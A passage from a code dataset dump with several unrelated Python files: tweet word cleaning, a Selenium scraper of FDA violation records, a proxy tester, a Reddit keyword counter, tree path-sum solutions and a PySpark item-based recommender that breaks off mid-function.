[\"the\",\"be\",\"to\",\"of\",\"and\",\"a\",\"in\",\"that\",\"have\",\"i\",\"it\",\"for\",\"not\",\"on\",\"with\",\"he\",\"as\",\"you\",\"do\",\"at\",\"this\",\"but\",\"his\",\"by\",\"from\",\"they\",\"we\",\"say\",\"her\",\"she\",\"or\",\"an\",\"will\",\"my\",\"one\",\"all\",\"would\",\"there\",\"their\",\"what\",\"so\",\"up\",\"out\",\"if\",\"about\",\"who\",\"get\",\"which\",\"go\",\"me\",\"when\",\"make\",\"can\",\"like\",\"time\",\"no\",\"just\",\"him\",\"know\",\"take\",\"people\",\"into\",\"year\",\"your\",\"good\",\"some\",\"could\",\"them\",\"see\",\"other\",\"than\",\"then\",\"now\",\"look\",\"only\",\"come\",\"its\",\"over\",\"think\",\"also\",\"back\",\"after\",\"use\",\"two\",\"how\",\"our\",\"work\",\"first\",\"well\",\"way\",\"even\",\"new\",\"want\",\"because\",\"any\",\"these\",\"give\",\"day\",\"most\",\"us\",\"\"]\n\ndef main(uncleanList):\n\tcleanedList = []\n\t\n\tfor item in uncleanList:\n\t\twords = string.split(item[\"text\"])\n\t\tnewWords = []\n\t\twhile len(words)>0:\n\t\t\t# This lowercases the words, strips punctuation, then removes mid-word apostrophes to\n\t\t\t# handle possessives. 
 I don't know whether anyone is going to hashtag the name of the\n\t\t\t# person they have a crush on so I included octothorpes in the punctuation filter.\n\t\t\tword = string.split(string.strip(string.lower(words.pop()),\",.!?';:#\"),\"'\")[0]\n\t\t\t\n\t\t\t# This handles mid-word periods because half the people who post on this Twitter\n\t\t\t# feed are dumbasses.\n\t\t\tif \".\" in word:\n\t\t\t\tsubwords = string.split(word, \".\")\n\t\t\t\tfor subword in subwords:\n\t\t\t\t\tadd = True\n\t\t\t\t\tfor rmWord in removedWords:\n\t\t\t\t\t\tif rmWord == subword:\n\t\t\t\t\t\t\tadd = False\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif add:\n\t\t\t\t\t\tnewWords.append(subword)\n\t\t\telse:\n\t\t\t\tadd = True\n\t\t\t\tfor rmWord in removedWords:\n\t\t\t\t\tif rmWord == word:\n\t\t\t\t\t\tadd = False\n\t\t\t\t\t\tbreak\n\t\t\t\tif add:\n\t\t\t\t\tnewWords.append(word)\n\t\tcleanedItem = {\"words\" : newWords,\"id\" : item[\"id_str\"],\"date\" : item[\"created_at\"],\"coincidence\":0}\n\t\tcleanedList.append(cleanedItem)\n\treturn cleanedList","repo_name":"revan/cRUshfinder","sub_path":"strip.py","file_name":"strip.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18156712497","text":"import numpy as np\nimport pandas as pd\nimport re\nimport os\n\n\nimport argparse\nparser = argparse.ArgumentParser(description='Train encoders.')\n\nparser.add_argument('-o', '--expfile', type=str,\n\t\t\t\t\thelp='Experiment file.')\nparser.add_argument('-f', '--features', nargs='+', default=[])\n\n\nl2_rate = 0.0008\ndropout = 0.5\n\ndef find_number(text, c):\n    return re.findall(r'%s(-?\\d+\\.\\d+)' % c, text)\n\ndef substring_before(s, delim):\n    return s.partition(delim)[0]\n\ndef create_features(train_encoders_best_file, features): #features: array --> e.g., [\"color\", \"vein\"]\n    experiments = pd.read_csv(train_encoders_best_file, index_col=[0])\n    data = experiments[experiments['feature'].isin(features)]\n    model_files = data['model_file'].unique()\n    l2_rates_values = data['l2_rate'].values\n    dropout_values = data['dropout'].values\n    data = data.drop(columns={'feature', 'model_file', 'val_acc', 'test_acc', 'l2_rate', 'dropout'})\n    data = data.drop_duplicates(keep='first', inplace=False)\n    data.reset_index(drop=True, inplace=True)\n    data['feature'] = np.asarray([','.join(features) for i in range(len(data))])\n    data['model_file'] = [substring_before(model_files[0], 'ENCODER') + 'ENCODER-{}-l2rate{}-dropout{}-fold{}.h5'.format('_'.join(features), l2_rate, dropout, i) for i in range(data.shape[0])]\n    if len(features) != 1:\n        data['l2_rate'] = l2_rate* np.ones(10)\n        data['dropout'] = dropout* np.ones(10)\n    else:\n        data['l2_rate'] = l2_rates_values\n        data['dropout'] = dropout_values\n\n    return data\n\nif __name__ == \"__main__\":\n    args = parser.parse_args()\n    features = args.features\n    data = create_features(args.expfile, features)\n    #Save data\n    name_file = \"features_data/\" + \"_\".join(features) + \"_feature.csv\"\n    data.to_csv(name_file, index=False)\n    print(f\"File {name_file} saved.\")\n","repo_name":"Tayerquach/Flavia_recognition","sub_path":"prepare_features.py","file_name":"prepare_features.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"27749349461","text":"# Task 1\nprint(' 1. 
Implement a generator function that returns the members of a geometric progression one at a time with the specified \\n'\n      'multiplier. The generator must stop either after reaching the specified element, or when a\\n'\n      'command to finish is passed.')\n\n\ndef geom_prog(multiplier, stop_element):\n    element = 1\n    while element <= stop_element:\n        yield element\n        element *= multiplier\n        if element > stop_element:\n            return\n\n\nfor n in geom_prog(2, 20):\n    print(n)\n\n# Task 2\nprint(' 2. Implement your own analog of the generator function range().')\n\n\ndef my_copy_range(start, end, step=1):\n    numbers = []\n    for i in range(start, end, step):\n        numbers.append(i)\n    return numbers\n\n\nprint(my_copy_range(0, 10))\n\n# Task 3\nprint(' 3. Write a generator function that returns prime numbers. The upper bound of the range must be set \\n'\n      'by a parameter of this function')\n\n\ndef prime_num(limit):\n    for num in range(2, limit + 1):\n        divider = 2\n        while divider < num:\n            if not num % divider:\n                break\n            divider += 1\n        else:\n            yield num\n    return\n\n\ng = prime_num(5)\nprint(next(g))\nprint(next(g))\nprint(next(g))\n\n\n# Task 4\nprint(' 4. Write a generator expression to fill a list. The list must be filled with the cubes of numbers from 2 \\n'\n      'up to the value you specify.')\n\n\ndef my_func(finish):\n    cubes = []\n    for start in range(2, finish + 1):\n        yield start ** 3\n        cubes.append(start ** 3)\n    return cubes\n\n\nfor i in my_func(6):\n    print(i)\n\n","repo_name":"doroshyulia/dorosh_yulia_prog_academy","sub_path":"Homework_OOP7.py","file_name":"Homework_OOP7.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33233831751","text":"import pygame\nimport random\nfrom pygame.locals import *\nfrom regular_polygons import *\n\n\nsize = width, height = 800, 800\n\nblack = 0,0,0\nwhite = 255,255,255\n\nscreen = pygame.display.set_mode(size)\n\nclock = pygame.time.Clock()\n\npygame.font.init()\n\nrunning = True\n\n\n# i = 3\n# tick = 0\n\nhx = Ennagram((400,400),390,0)\n\nwhile running:\n    screen.fill(black)\n\n    \n    pygame.draw.polygon(screen, (255,255,255),hx.get_points(), width=1)\n    #hx.rotate(0.1)\n    # if tick == 10:\n    #     tick = 0\n    #     i+=1\n    # else:\n    #     tick+=1\n    # if i > 20:\n    #     i = 3\n\n    pygame.display.update()\n    clock.tick(60)","repo_name":"MassimoSandre/python_misc","sub_path":"regular_polygon/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13583572617","text":"import os\nimport logging\nfrom csv import writer, reader\nfrom datetime import date\nfrom random import randint\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import sleep\n\npwd = os.path.dirname(os.path.abspath(__file__)).replace('\\\\', '/')\n\n\ndef writeCsv(path, name, data, mode='w+'):\n    if not os.path.isdir(path):\n        os.makedirs(path)\n    with open(f'{path}/{name}', mode=f'{mode}', encoding='utf-8-sig', newline='') as f:\n        for a in data:\n            writer(f).writerow(a)\n    logging.info(f'{name} saved!')\n\n\ndef readCsv(path, name):\n    return [c for c in reader(open(f'{path}/{name}', mode='r', encoding='utf-8-sig', newline=''))]\n\n\ndef yearsCalc(yearsAgo=0):\n    '''List the years of the most recent yearsAgo years'''\n    a = []\n    for b in range(0, yearsAgo):\n        a.append(str(date.today().year - b))\n    return 
 a\n\n\ndef getLists(keyword, driver, data):\n    sleepTime = randint(10, 20)\n    res = driver.find_elements(By.CSS_SELECTOR, '.table_list tr')\n    if len(res) == 0:\n        writeCsv(f'{pwd}/csv', '違規紀錄.csv', [[keyword[0], '無違規紀錄']], mode='a+')\n        for a in range(0, sleepTime):\n            logging.info(f'wait {sleepTime - a} sec')\n            sleep(1)\n        return [keyword[0], len(res)]\n    lastYear = res[len(res) - 1].find_elements(By.CSS_SELECTOR, 'td')[3].find_elements(By.CSS_SELECTOR, 'li')[1].text.split('.')[0]\n    del res[0]\n    for a in res:\n        b = a.find_elements(By.CSS_SELECTOR, 'td')\n        date = b[3].find_elements(By.CSS_SELECTOR, 'li')[1].text\n        yearRange = yearsCalc(3)\n        if str(1911 + int(date[0:3])) in yearRange:\n            product = b[1].text\n            url = b[1].find_element(By.CSS_SELECTOR, 'a[href]').get_attribute('href')\n            company = b[2].text\n            data.append([company, date, product, url])\n            logging.info([company, date, product, url])\n        elif str(1911 + int(date[0:3])) < yearRange[len(yearRange) - 1]:\n            writeCsv(f'{pwd}/csv', '違規紀錄.csv', [[keyword[0], '違規紀錄三年以前']], mode='a+')\n    for a in range(0, sleepTime):\n        logging.info(f'wait {sleepTime - a} sec')\n        sleep(1)\n    return [lastYear, len(res)]\n\n\ndef getLinks(driver, keyword, data):\n    driver.find_element(By.CSS_SELECTOR, '#ctl00_Content_txtVioCompany').clear()\n    driver.find_element(By.CSS_SELECTOR, '#ctl00_Content_txtVioCompany').send_keys(keyword[0])\n    driver.find_element(By.CSS_SELECTOR, '#ctl00_Content_btnSubmit').click()\n    while True:\n        lastYear = getLists(keyword, driver, data)\n        if lastYear[1] == 0:\n            logging.info('no result')\n            break\n        elif str(int(lastYear[0]) + 1911) in yearsCalc(3) and int(lastYear[0]) == 11:\n            logging.info('next page')\n            driver.find_element(By.CSS_SELECTOR, 'a.next').click()\n        else:\n            break\n    writeCsv(f'{pwd}/csv', '違規紀錄_連結.csv', data)\n\n\ndef getVio(driver):\n    links = readCsv(f'{pwd}/csv', '違規紀錄_連結.csv')\n    data = []\n    for link in links:\n        driver.get(link[3])\n        sleepTime = randint(10, 20)\n        for a in range(0, sleepTime):\n            logging.info(f'wait {sleepTime - a} sec')\n            sleep(1)\n        row = link[:-1]\n        for a in driver.find_elements(By.CSS_SELECTOR, '.table_data tr'):\n            b = a.find_element(By.CSS_SELECTOR, 'th').text\n            if '違規情節' in b:\n                row.append(a.find_element(By.CSS_SELECTOR, 'td').text)\n            elif '查處情形' in b:\n                row.append(a.find_element(By.CSS_SELECTOR, 'td').text)\n        row.append(link[-1])\n        data.append(row)\n    writeCsv(f'{pwd}/csv', '違規紀錄.csv', data, mode='a+')\n    if os.path.exists(f'{pwd}/csv/違規紀錄_連結.csv'):\n        os.remove(f'{pwd}/csv/違規紀錄_連結.csv')\n\n\ndef main():\n    data = []\n    driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n    url = 'https://pmds.fda.gov.tw/illegalad/CaseSearch.aspx'\n    writeCsv(f'{pwd}/csv', '違規紀錄.csv', [])\n    driver.get(url)\n    for keyword in readCsv(f'{pwd}/csv', 'keywords.csv'):\n        try:\n            getLinks(driver, keyword, data)\n        except Exception as e:\n            writeCsv(f'{pwd}/csv', '違規紀錄.csv', [[keyword[0], '抓取失敗!']], mode='a+')\n            logging.warning(f'{keyword[0]} {e} fail!')\n    getVio(driver)\n    driver.close()\n\n\nif __name__ == '__main__':\n    logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO, filename=f'{pwd}/.tmp/viorec.log')\n    main()\n","repo_name":"Astalsi401/python","sub_path":"projects/crawler/illegalFda/illegal.py","file_name":"illegal.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32255653562","text":"\"\"\"\nA B C\nD E F\nG H I\n\nHow many path combinations can we get with such an array under the 
following\nconstraints?\n\n1. We can't use any position twice.\n2. We're only allowed to travel one position unless we can \"fly over\" a\nused position.\n3. Weird semi-diagonal paths like B -> I are allowed, and such paths\ndon't \"fly over\" anything.\n4. Can't have more steps than introduced (counting starting point)\n\"\"\"\n\nfrom utils import *\n\nSTARTING_POINT = None \t# Must be a string from A to I\nSTEPS = None \t\t\t# Must be an integer\n\n\ndef solverOrchestration(STARTING_POINT, STEPS):\n\t\"\"\"\n\tCalculates all possible combinations from STARTING_POINT\n\t\"\"\"\n\n\tpossiblePathsList = getPossiblePaths(STARTING_POINT)\n\n\t# Do such combinations satisfy all the constraints?\n\t# if so, include in satisfiedList\n\tsatisfiedList = []\n\n\tfor element in possiblePathsList:\n\t\t# Checking all conditions\n\t\t# THESE MAY NOT BE NECESSARY\n\t\t# DEVELOP getPossiblePaths FIRST\n\t\tif hasDuplicates(element): continue\n\t\tif len(element) != STEPS: continue\n\t\tif hasWrongFlyOvers(element): continue\n\n\t\t# Adding to list if meets all criteria\n\t\tsatisfiedList.append(element)\n\n\treturn satisfiedList\n\n\n# Asking for user input\n\nprint(\"Please, enter your starting point and the desired number of steps.\")\nSTARTING_POINT = input(\"Starting point (A string from A to I): \")\nSTEPS = int(input(\"Number of desired steps (An integer): \"))\nSTARTING_POINT = STARTING_POINT.upper()\n\n# Printing result\n\ntoPrint = solverOrchestration(STARTING_POINT, STEPS)\n\nprint(\"These are all possible paths within given constraints:\")\nfor element in toPrint:\n\tprint(element)","repo_name":"iagovar/openbootcamp","sub_path":"99 Reto Python/2 patronesDesbloqueo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24704613656","text":"import pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType\n\n\n\nspark = SparkSession.builder.appName('Test').getOrCreate()\n\n\n\n# Define a structure\nschema = StructType([StructField('id', StringType(), True),\n                      StructField('num', IntegerType(), True)\n                      ])\n\n\n# We create a DF with a defined schema\ndf = spark.createDataFrame([[1,2],\n                            [3,4]],schema)\n\ndf.printSchema()\n\n\n# Define a nested structure\n\n\ndata = [((\"James\",None,\"Smith\"),\"OH\",\"M\"),\n        ((\"Anna\",\"Rose\",\"\"),\"NY\",\"F\"),\n        ((\"Julia\",\"\",\"Williams\"),\"OH\",\"F\"),\n        ((\"Maria\",\"Anne\",\"Jones\"),\"NY\",\"M\"),\n        ((\"Jen\",\"Mary\",\"Brown\"),\"NY\",\"M\"),\n        ((\"Mike\",\"Mary\",\"Williams\"),\"OH\",\"M\")\n        ]\n\nschema = StructType([\n    StructField('name', StructType([\n        StructField('firstname', StringType(), True),\n        StructField('middlename', StringType(), True),\n        StructField('lastname', StringType(), True)\n    ])),\n    StructField('state', StringType(), True),\n    StructField('gender', StringType(), True)\n    ])\n\ndf2 = spark.createDataFrame(data = data, schema = schema)\ndf2.printSchema()\n\n\nspark.stop()","repo_name":"BenRamo06/PySpark","sub_path":"pipeline/Dataframe/03.-Dataframe_Structure.py","file_name":"03.-Dataframe_Structure.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40744720628","text":"#!/usr/bin/env python -tt\n# encoding: utf-8\nfrom django.conf.urls import *\n\nurlpatterns = patterns('',\n                       # 3rd party, modified for widelands\n                       
(r'^wiki/', include('wiki.urls')),\n (r'^forum/', include('pybb.urls')),\n\n # WL specific:\n url(r'^$', lambda *args, **kwargs: None, name='mainpage'),\n url(r'^webchat/', include('wlwebchat.urls')),\n url(r'^maps/', include('wlmaps.urls')),\n url(r'^screenshots/', include('wlscreens.urls')),\n url(r'^wlscreens/', include('wlscreens.urls')),\n )\n","repo_name":"risooonho/widelands-website","sub_path":"wlscreens/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"73029486177","text":"import asyncio\nimport aiohttp\nfrom loguru import logger\nfrom proxypool.schemas import Proxy\nfrom proxypool.storages.redis import RedisClient\nfrom proxypool.setting import TEST_TIMEOUT, TEST_BATCH, TEST_URL, TEST_VALID_STATUS, TEST_ANONYMOUS\nfrom aiohttp import ClientProxyConnectionError, ServerDisconnectedError, ClientOSError, ClientHttpProxyError\nfrom asyncio import TimeoutError\n\n\nEXCEPTIONS = (\n ClientProxyConnectionError,\n ConnectionRefusedError,\n TimeoutError,\n ServerDisconnectedError,\n ClientOSError,\n ClientHttpProxyError,\n AssertionError\n)\n\n\nclass Tester(object):\n \"\"\"\n tester for testing proxies in queue\n \"\"\"\n \n def __init__(self):\n \"\"\"\n init redis\n \"\"\"\n self.redis = RedisClient()\n self.loop = asyncio.get_event_loop()\n \n async def test(self, proxy: Proxy):\n \"\"\"\n test single proxy\n :param proxy: Proxy object\n :return:\n \"\"\"\n async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False)) as session:\n try:\n logger.debug(f'testing {proxy.string()}')\n # if TEST_ANONYMOUS is True, make sure that\n # the proxy has the effect of hiding the real IP\n if TEST_ANONYMOUS:\n url = 'https://httpbin.org/ip'\n async with session.get(url, timeout=TEST_TIMEOUT) as response:\n resp_json = await response.json()\n origin_ip = resp_json['origin']\n async with session.get(url, proxy=f'http://{proxy.string()}', timeout=TEST_TIMEOUT) as response:\n resp_json = await response.json()\n anonymous_ip = resp_json['origin']\n assert origin_ip != anonymous_ip\n assert proxy.host == anonymous_ip\n async with session.get(TEST_URL, proxy=f'http://{proxy.string()}', timeout=TEST_TIMEOUT,\n allow_redirects=False) as response:\n if response.status in TEST_VALID_STATUS:\n self.redis.max(proxy)\n logger.debug(f'proxy {proxy.string()} is valid, set max score')\n else:\n self.redis.decrease(proxy)\n logger.debug(f'proxy {proxy.string()} is invalid, decrease score')\n except EXCEPTIONS:\n self.redis.decrease(proxy)\n logger.debug(f'proxy {proxy.string()} is invalid, decrease score')\n \n @logger.catch\n def run(self):\n \"\"\"\n test main method\n :return:\n \"\"\"\n # event loop of aiohttp\n logger.info('stating tester...')\n count = self.redis.count()\n logger.debug(f'{count} proxies to test')\n cursor = 0\n while True:\n logger.debug(f'testing proxies use cursor {cursor}, count {TEST_BATCH}')\n cursor, proxies = self.redis.batch(cursor, count=TEST_BATCH)\n if proxies:\n tasks = [self.test(proxy) for proxy in proxies]\n self.loop.run_until_complete(asyncio.wait(tasks))\n if not cursor:\n break\n\ndef run_tester():\n host = '96.113.165.182'\n port = '3128'\n tasks = [tester.test(Proxy(host=host, port=port))]\n tester.loop.run_until_complete(asyncio.wait(tasks))\n\nif __name__ == '__main__':\n tester = Tester()\n tester.run()\n # 
run_tester()\n\n","repo_name":"Python3WebSpider/ProxyPool","sub_path":"proxypool/processors/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":5076,"dataset":"github-code","pt":"34"} +{"seq_id":"20508668393","text":"#!/usr/bin/python3\n\"\"\"Prints hot articles by keyword from the Reddit API.\"\"\"\nimport requests\n\n\ndef count_words(subreddit, word_list, kw_count={}, after=None, word_occ={}):\n    \"\"\"list posts in hot section of a subreddit\"\"\"\n\n    if after:\n        hot_posts = requests.get('https://reddit.com/r/' + subreddit +\n                                 '/hot.json?after=' + after,\n                                 headers={\"User-Agent\": \"hot_scraping_app\",\n                                          \"limit\": '100'})\n    else:\n        hot_posts = requests.get('https://reddit.com/r/' + subreddit +\n                                 '/hot.json',\n                                 headers={\"User-Agent\": \"hot_scraping_app\",\n                                          \"limit\": '100'})\n\n    # Status 404\n    if hot_posts.status_code == 404:\n        return\n\n    if kw_count == {}:\n        for word in word_list:\n            kw_count[word] = 0\n            word_occ[word] = word_list.count(word)\n\n    # parse json\n    hot_posts_dict = hot_posts.json()\n    hot_posts_data = hot_posts_dict['data']\n    after = hot_posts_data['after']\n    hot_posts_posts = hot_posts_data['children']\n\n    # Post data\n    for post in hot_posts_posts:\n        post_data = post['data']\n        post_title = post_data['title']\n        title_words = post_title.split()\n        for w in title_words:\n            for key in kw_count:\n                if w.lower() == key.lower():\n                    kw_count[key] += 1\n\n    if after:\n        count_words(subreddit, word_list, kw_count, after, word_occ)\n\n    else:\n        for k, v in word_occ.items():\n            if v > 1:\n                kw_count[k] *= v\n\n        sorted_titles = sorted(kw_count.items(), key=lambda x: x[0])\n        sorted_res = sorted(sorted_titles, key=lambda x: (-x[1], x[0]))\n\n        for res in sorted_res:\n            if res[1] > 0:\n                print(\"{}: {}\".format(res[0], res[1]))\n","repo_name":"stellarAlien/holbertonschool-interview","sub_path":"0x13-count_it/0-count.py","file_name":"0-count.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27937135673","text":"class TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\nclass Solution1:\n    def __init__(self):\n        self.result = []\n        self.path = []\n\n    def traversal(self, node, count):\n        \"\"\"\n        Time O(n)\n        Space O(n)\n        Post-order style traversal; count checks, via subtraction, whether the current node reaches the target sum. Since all paths are recorded, no value needs to be returned during the recursion.\n        Each level processes the value and path of the current node's children.\n        \"\"\"\n        if node.left is None and node.right is None and count == 0:\n            self.result.append(self.path[:])  # deep copy path\n            return\n        if node.left is None and node.right is None:\n            return\n\n        if node.left:  # each level processes the child node's value and path\n            self.path.append(node.left.val)  # recurse\n            count -= node.left.val  # backtracking: if the sum is not satisfied after subtracting, add it back, i.e. return to the previous node\n            self.traversal(node.left, count)\n            count += node.left.val\n            self.path.pop()\n\n        if node.right:  # each level processes the child node's value and path\n            self.path.append(node.right.val)\n            count -= node.right.val  # backtracking: if the sum is not satisfied after subtracting, add it back, i.e. return to the previous node\n            self.traversal(node.right, count)\n            count += node.right.val\n            self.path.pop()\n\n        return\n\n    def pathSum(self, root: TreeNode, targetSum: int) -> [[int]]:\n\n        if root is None:\n            return self.result\n\n        self.path.append(root.val)\n        self.traversal(root, targetSum - root.val)\n\n        return self.result\n\n\nclass Solution2:\n    def __init__(self):\n        self.result = []\n        self.path = []\n\n    def traversal(self, node, value, target):\n        \"\"\"\n        Time O(n)\n        Space O(n)\n        Pre-order style traversal; value handles the current node's value, while path handles the next child node's value.\n        
Unlike value, the path list cannot be limited to the current level's node: the path list passed down to the next level mutates the values recorded by earlier levels\n        \"\"\"\n        if node.left is None and node.right is None:\n            if target - value == node.val:\n                path_copy = self.path.copy()\n                self.result.append(path_copy)\n                return\n            else:\n                return\n\n        value += node.val  # each level processes the current node's value and its children's path\n\n        if node.left:\n            self.path.append(node.left.val)\n            self.traversal(node.left, value, target)\n            self.path.pop()\n\n        if node.right:\n            self.path.append(node.right.val)\n            self.traversal(node.right, value, target)\n            self.path.pop()\n\n        return\n\n    def pathSum(self, root: TreeNode, targetSum: int) -> [[int]]:\n\n        if root is not None:\n            self.path.append(root.val)\n            self.traversal(root, 0, targetSum)\n            return self.result\n        else:\n            return self.result\n\n\nclass Solution3:\n    def __init__(self):\n        self.result = []\n\n    def traversal(self, node, value, path, target):\n        \"\"\"\n        Time O(n)\n        Space O(n)\n        Pre-order style traversal; value handles the current node's value, and path also handles the current node's value.\n        But the path list passed down a level mutates the values of earlier levels' path list, so after the recursion we must backtrack and pop out.\n        \"\"\"\n        value += node.val\n        path.append(node.val)\n\n        if node.left is None and node.right is None:\n            if target == value:\n                path_copy = path.copy()\n                self.result.append(path_copy)\n                return\n            else:\n                return\n\n        if node.left:  # each level processes the current node's value and the current node's path\n            self.traversal(node.left, value, path, target)\n            path.pop()  # the pre-order step appended at the start, so we must backtrack afterwards, returning to the previous node\n\n        if node.right:\n            self.traversal(node.right, value, path, target)\n            path.pop()\n\n        return\n\n    def pathSum(self, root: [TreeNode], targetSum: int) -> [[int]]:\n        if root:\n            self.traversal(root, 0, [], targetSum)\n\n        return self.result\n\n\nt1 = TreeNode(val=1)\nt2 = TreeNode(val=2)\nt3 = TreeNode(val=4)\nt1.left = t2\nt1.right = t3\nsolution = Solution3()\nprint(solution.pathSum(t1, 5))\n","repo_name":"jsheng0901/leetcode","sub_path":"Binary Tree/113.py","file_name":"113.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17297798267","text":"# -*- coding: utf-8 -*-\nimport findspark\nimport gc\nfrom joblib import dump, load\nimport numpy as np \nfindspark.init()\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField, StructType, LongType, StringType, IntegerType\nimport pyspark.sql.functions as F\nfrom pyspark import SparkContext, SparkConf\nfrom tqdm import tqdm\nfrom itertools import permutations\nfrom collections import defaultdict\nimport time\n\nspark = SparkSession.builder.appName(\"item cf on spark\").master(\"local[8]\").getOrCreate()\n\nsc = spark.sparkContext\n\nschema = StructType([StructField('userId', IntegerType(), True), \n                     StructField('movieId', IntegerType(), True), \n                     StructField('rating', LongType(), True), \n                     StructField('timestamp', IntegerType(), True)])\nratings = spark.read.csv(r'D:\\\Users\\\hao.guo\\\deepctr\\\recsys\\\movielen\\\ml-20m\\\ratings_small.csv', header=True)\n\nratings = ratings.withColumn('rating', ratings['rating'].cast('int'))\nratings_rdd = ratings.select(['userId', 'movieId', 'rating']).rdd\n# ratings_rdd = ratings_rdd.sample(withReplacement=False, fraction=0.5, seed=2020)\ntrain_rdd, test_rdd = ratings_rdd.randomSplit([0.7, 0.3], seed=2020)\n# train_rdd = train_rdd.cache()\n# test_rdd = test_rdd.cache()\n\nprint('item cf start......')\ns = time.perf_counter()\n\ncreateCombiner = lambda v: [v]\nmergeValue = lambda agg, v: agg + [v]\nmergeCombiners = lambda agg1, agg2: agg1 + agg2\n\n# replaces groupByKey\ntrain_user_items = train_rdd.map(lambda s: ('user_' + s['userId'], [('item_' + s['movieId'], 
s['rating'])])).reduceByKey(lambda p1, p2: p1 + p2)\ntrain_item_norm_dict = train_rdd.map(lambda s: ('item_' + s['movieId'], s['rating'] ** 2)).reduceByKey(lambda p1, p2: p1 + p2).mapValues(lambda v: np.sqrt(v)).collectAsMap()\n\ntrain_item_norm_dict = sc.broadcast(train_item_norm_dict)\n\n'''\n    Get all user-user rating pair combinations for two items:\n    (item1_id,item2_id) -> [(rating1,rating2),\n                            (rating1,rating2),\n                            (rating1,rating2),\n                            ...]\n'''\ndef findpairs(pairs):\n    res = []\n    # account for the influence of active users: interest in unpopular items is stronger evidence of similarity\n    m = len(pairs)\n    for u1, u2 in permutations(pairs, 2):\n        res.append(((u1[0], u2[0]), [(u1[1] / np.log1p(m), u2[1] / np.log1p(m))]))\n        # res.append(((u1[0], u2[0]), (u1[1], u2[1])))\n    return res\n\npairwise_items = train_user_items.filter(lambda p: len(p[1]) > 1).map(lambda p: p[1]).flatMap(lambda p: findpairs(p)).reduceByKey(lambda p1, p2: p1 + p2)\n\n'''\n    Compute cosine similarity and find the N nearest neighbors:\n    (item1,item2) -> (similarity,co_raters_count)\n'''\n\ndef cosine(product, r1_norm, r2_norm):\n    fenmu = r1_norm * r2_norm\n    return product / fenmu if fenmu else 0.0\n\ndef calcSim(pairs, item_norm_dict):\n    ''' \n    For each item pair, compute the cosine distance from the ratings and return the number of co-rating users\n    '''\n    # other positions are 0\n    sum_xy, n = 0.0, 0\n\n    for rating_pair in pairs[1]:\n        sum_xy += rating_pair[0] * rating_pair[1]\n        n += 1\n\n    cos_sim = cosine(sum_xy, item_norm_dict[pairs[0][0]], item_norm_dict[pairs[0][1]])\n    return pairs[0], (cos_sim, n)\n\ndef keyOnFirstItem(pairs):\n    '''\n    For each item-item pair, use the first item as the key\n    '''\n    (item1_id, item2_id) = pairs[0]\n    return item1_id,(item2_id, pairs[1])\n\ndef nearestNeighbors(item_id, co_pairs, n):\n    '''\n    Select the N items with the highest similarity\n    '''\n    # normalize\n    max_w = np.max([pairs[0] for i, pairs in co_pairs])\n    scored_pairs = [(i, (pairs[0] / max_w if max_w != 0 else 0.0, pairs[1])) for i, pairs in co_pairs]\n    scored_pairs.sort(key=lambda x: x[1][0], reverse=True)\n    return item_id, scored_pairs[:n]\n\ndef item_sim(pairwise_items, train_item_norm_dict, n):\n    item_sims = pairwise_items.map(lambda p: calcSim(p, train_item_norm_dict.value)).map(keyOnFirstItem).combineByKey(createCombiner, mergeValue, mergeCombiners).map(lambda p: nearestNeighbors(p[0], p[1], n))\n    return item_sims\n\n\n'''\n    Compute the top-N recommendations for each user\n    user_id -> [item1,item2,item3,...]\n'''\ndef topNRecommendations(user_id, items_with_rating, item_sim_w, n):\n    '''\n    Recommend based on the N nearest items\n    '''\n\n    totals = defaultdict(int)\n\n    user_items = [i for i, r in items_with_rating]\n\n    for item, rating in items_with_rating:\n        # iterate over the neighbors' ratings\n        nearest_neighbors = item_sim_w.get(item, None)\n\n        if nearest_neighbors:\n            for neighbor, (sim,count) in nearest_neighbors:\n                if neighbor in user_items:\n                    continue\n                # update recommendation score and similarity\n                totals[neighbor] += sim * rating\n\n    # sort by recommendation score in descending order\n    totals = sorted(totals.items(), key=lambda p: p[1], reverse=True)\n\n    # items ordered by recommendation score\n    ranked_items = [x[0] for x in totals]\n\n    return user_id, ranked_items[:n]\n\ndef Precision(user_id, pui, test, n):\n    hit = 0\n    all = 0\n    tui = test[user_id]\n    for item in pui:\n        if item in tui:\n            hit += 1\n    all += n\n    return (hit, all)\n\ndef Recall(user_id, pui, 